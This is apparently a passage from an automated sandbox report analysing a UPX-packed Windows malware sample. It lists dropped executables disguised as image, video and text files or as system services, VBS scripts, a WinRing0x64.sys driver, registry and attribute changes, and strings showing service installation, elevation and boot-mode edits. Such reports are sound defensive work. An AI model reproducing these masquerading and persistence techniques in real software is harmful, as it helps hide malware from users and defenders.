                            Source: screen.exe0.15.drStatic PE information: real checksum: 0x0 should be: 0x18b14
                            Source: screen.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x18b14
                            Source: scre.jpg.15.drStatic PE information: real checksum: 0x0 should be: 0x18b14
                            Source: screen.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18b14
                            Source: cmdow.exe.0.drStatic PE information: section name: .eh_fram
                            Source: Systemfont.txt.0.drStatic PE information: section name: /4
                            Source: Systemfont.txt.0.drStatic PE information: section name: /14
                            Source: Systemfont.txt.0.drStatic PE information: section name: /29
                            Source: Systemfont.txt.0.drStatic PE information: section name: /41
                            Source: Systemfont.txt.0.drStatic PE information: section name: /55
                            Source: Systemfont.txt.0.drStatic PE information: section name: /67
                            Source: Systemfont.txt.0.drStatic PE information: section name: /80
                            Source: Systemfont.txt.0.drStatic PE information: section name: /91
                            Source: Systemfont.txt.0.drStatic PE information: section name: /102
                            Source: RtkAudio.txt.0.drStatic PE information: section name: .xdata
                            Source: cmdow.exe.15.drStatic PE information: section name: .eh_fram
                            Source: cmdow.exe0.15.drStatic PE information: section name: .eh_fram
                            Source: Systemfont.exe.15.drStatic PE information: section name: /4
                            Source: Systemfont.exe.15.drStatic PE information: section name: /14
                            Source: Systemfont.exe.15.drStatic PE information: section name: /29
                            Source: Systemfont.exe.15.drStatic PE information: section name: /41
                            Source: Systemfont.exe.15.drStatic PE information: section name: /55
                            Source: Systemfont.exe.15.drStatic PE information: section name: /67
                            Source: Systemfont.exe.15.drStatic PE information: section name: /80
                            Source: Systemfont.exe.15.drStatic PE information: section name: /91
                            Source: Systemfont.exe.15.drStatic PE information: section name: /102
                            Source: RtkAudio.exe.15.drStatic PE information: section name: .xdata
                            Source: RtkAudio.exe0.15.drStatic PE information: section name: .xdata
                            Source: RtkAudio.exe1.15.drStatic PE information: section name: .xdata
                            Source: cmdo.jpg.15.drStatic PE information: section name: .eh_fram
                            Source: cm.avi.15.drStatic PE information: section name: .eh_fram
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /4
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /14
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /29
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /41
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /55
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /67
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /80
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /91
                            Source: Systemfo.jpg.15.drStatic PE information: section name: /102
                            Source: Sy.avi.15.drStatic PE information: section name: /4
                            Source: Sy.avi.15.drStatic PE information: section name: /14
                            Source: Sy.avi.15.drStatic PE information: section name: /29
                            Source: Sy.avi.15.drStatic PE information: section name: /41
                            Source: Sy.avi.15.drStatic PE information: section name: /55
                            Source: Sy.avi.15.drStatic PE information: section name: /67
                            Source: Sy.avi.15.drStatic PE information: section name: /80
                            Source: Sy.avi.15.drStatic PE information: section name: /91
                            Source: Sy.avi.15.drStatic PE information: section name: /102
                            Source: Aud.jpg.15.drStatic PE information: section name: .xdata
                            Source: Au.avi.15.drStatic PE information: section name: .xdata
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00410C10 push eax; ret 18_2_00410C24
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00410C10 push eax; ret 18_2_00410C4C
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00410BD5 push ecx; ret 18_2_00410BE5
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\est1.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Vnoad.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\stwinvr.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\aatem.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\aapub.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\aapro.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\WinRing0x64.sysJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sysJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Ri.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\screen.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\sc.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\WinRing0x64.sysJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\screen.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sysJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpgJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\RtkAudio.txtJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\Systemfont.txtJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Au.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\tv_x86.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exeJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\In.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\cm.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Sy.aviJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.txtJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Systemfont.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\RuntimeBroker.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpgJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\cmdow.exeJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\screen.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\screen.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cmdow.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\RtkAudio.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\WinRing0x64.sysJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\screen.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\IntelSvc.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Ri.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\sc.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\cm.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Sy.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\RuntimeBroker.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Au.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\In.aviJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\Systemfont.txtJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.txtJump to dropped file
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\RtkAudio.txtJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\sc.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\cm.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Sy.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Au.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpgJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\Ri.aviJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\en\In.aviJump to dropped file
                            Source: K4gsPJGEi4.exeBinary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: IntelSvc.exe.0.drBinary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: IntelSvc.exe1.15.drBinary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: tv_x86.exe.15.drBinary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: Null11.15.drBinary or memory string: 'C:\Windows\System32\bcdedit.exe' is not recognized as an internal or external command,
                            Source: IntelSvc.exe0.15.drBinary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: In.avi.15.drBinary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog 